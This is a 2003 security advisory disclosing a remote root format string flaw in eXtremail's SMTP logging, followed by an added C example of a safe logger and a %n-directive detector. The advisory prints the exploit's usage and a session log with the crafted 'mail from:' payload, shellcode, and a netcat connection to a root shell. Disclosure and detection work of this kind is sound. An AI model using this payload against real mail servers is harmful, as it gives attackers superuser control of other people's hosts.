
eXtremail.txt
Posted Jul 7, 2003
Authored by B-r00t

Linux eXtremail versions 1.5-8 and below contain a format string vulnerability in their logging mechanism. Exploiting it can allow arbitrary code execution or a denial of service on the server.

tags | advisory, denial of service, arbitrary, code execution
systems | linux
SHA-256 | 9f300aec91de3f79ec8ad7dea040e62aded97cd4340b3ea05a7067bc03e93163

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1








Remote Vulnerabilities in eXtremail Server.
===========================================

Date: 02.07.2003
Email: B-r00t <br00t@blueyonder.co.uk>

Reference: http://www.extremail.com/
Versions:  Linux eXtremail-1.5-8 => VULNERABLE
           Linux eXtremail-1.5-5 => VULNERABLE

Exploit: eXtreme.c

eXtremail is a Unix mail server providing SMTP (port 25), POP3 (port 110)
and IMAP (port 143) services. The latest versions are still vulnerable to
format string vulnerabilities of the kind discovered previously:

http://www.securityfocus.com/bid/2908/info/

eXtremail contains a format string vulnerability in its logging
mechanism. It is possible for users to send SMTP commands with
maliciously constructed arguments that will exploit this vulnerability.

eXtremail runs with root privileges. By exploiting this vulnerability,
remote attackers can gain superuser access on the underlying host. It is
also possible to crash eXtremail. If it is not restarted automatically, a
denial of SMTP service will result.

These vulnerabilities were apparently fixed in version 'eXtremail 1.1.10',
however they seem to have re-emerged in the latest versions.

Attached exploit [eXtreme.c] for latest versions of eXtremail.

$ gcc -o eXtreme eXtreme.c

$ ./eXtreme

eXtreme by B-r00t <br00t@blueyonder.co.uk>. (c) 2003

Usage: eXtreme [IP_ADDRESS] [TARGET]
Example: eXtreme 10.0.0.1 2

0 RedHat 7.2 eXtremail V1.5 release 5 (eXtremail-1.5-5.i686.rpm)
1 Linux ANY eXtremail V1.5 release 5 (eXtremail-1.5-5.tar.gz)
2 Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)
3 eXtremail V1.5 DEBUG

On success a r00tshell will be spawned on port 36864.






$ ./eXtreme 192.168.0.50 2

eXtreme by B-r00t <br00t@blueyonder.co.uk>. (c) 2003

Connected to 192.168.0.50
Recv: 220 localdomain eXtremail V1.5 release 7 ESMTP server ready ...
Send: HELO Br00t~R0x~Y3r~W0rld!
Recv: 250 Hi, I am localdomain

System type: Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)
Write Addy: 0xbefff0c8
RET (shellcode): 0xbefff1d4
PAD (alignment): 1
Payload: 254 / 266 max bytes
Sending it ...
Send: mail from: a%.176u%44$n%.29u%45$n%.14u%46$n%.191u%47$nn^) F@
F@ /bin/shCf Vf VfC?)?A?AV v
Using netcat 'nc' to get the r00tshell on port 36864 ....!!!!!

Connection to 192.168.0.50 36864 port [tcp/*] succeeded!
id; uname -a;
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Linux RedHat-9-0 2.4.20-8 #1 Thu Mar 13 16:42:56 EST 2003 i586 i586 i386
GNU/Linux



- --

B#.
- ----------------------------------------------------
Email : B-r00t <br00t@blueyonder.co.uk>
Key fingerprint = 74F0 6A06 3E57 083A 4C9B
ED33 AD56 9E97 7101 5462
"You Would Be Paranoid If They Were Watching You !!!"
- -----------------------------------------------------







-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (OpenBSD)

iD8DBQE/AitlrVael3EBVGIRAmIQAKCNyf8dsUV9Fw3WIFL7o64UDRTnmgCgpY39
HBOcgtG6P1BPhcxYzG/AoAM=
=GHV2
-----END PGP SIGNATURE-----
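The logging flaw described in the advisory, seen from the defender's side. This is an added example, not code from the advisory, the exploit or eXtremail itself (whose logging source is not shown on this page). The function names `log_smtp_arg` and `count_write_directives` are hypothetical, and the sample string is the printable part of the `mail from:` argument from the session output above.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample: printable part of the "mail from:" argument shown above. */
static const char SAMPLE_ARG[] = "a%.176u%44$n%.29u%45$n%.14u%46$n%.191u%47$n";

/* Hypothetical logger. The vulnerable pattern passes client data as the format:
 *     snprintf(out, outsz, smtp_arg);      (client controls the directives)
 * The hardened form uses a constant format, so the data is copied as text. */
int log_smtp_arg(char *out, size_t outsz, const char *smtp_arg)
{
    return snprintf(out, outsz, "MAIL FROM arg: %s", smtp_arg);
}

/* Count printf conversions that end in 'n' (the memory-writing directive),
 * including positional forms such as %44$n. "%%" is a literal percent. */
int count_write_directives(const char *s)
{
    int hits = 0;
    while ((s = strchr(s, '%')) != NULL) {
        s++;
        if (*s == '%') { s++; continue; }
        /* skip position, flags, width and precision */
        while (*s && (isdigit((unsigned char)*s) || strchr("$-+ #'*.", *s)))
            s++;
        /* skip length modifiers */
        while (*s && strchr("hlLqjzt", *s))
            s++;
        if (*s == 'n')
            hits++;
    }
    return hits;
}

int main(void)
{
    char line[128];
    log_smtp_arg(line, sizeof line, SAMPLE_ARG);
    printf("%s\nwrite directives: %d\n", line, count_write_directives(SAMPLE_ARG));
    return 0;
}
```

A `%` can appear legitimately in mail addresses, so the counter is a signal for alerting on SMTP logs or traffic rather than a filter; the constant format string in the logger is the actual fix.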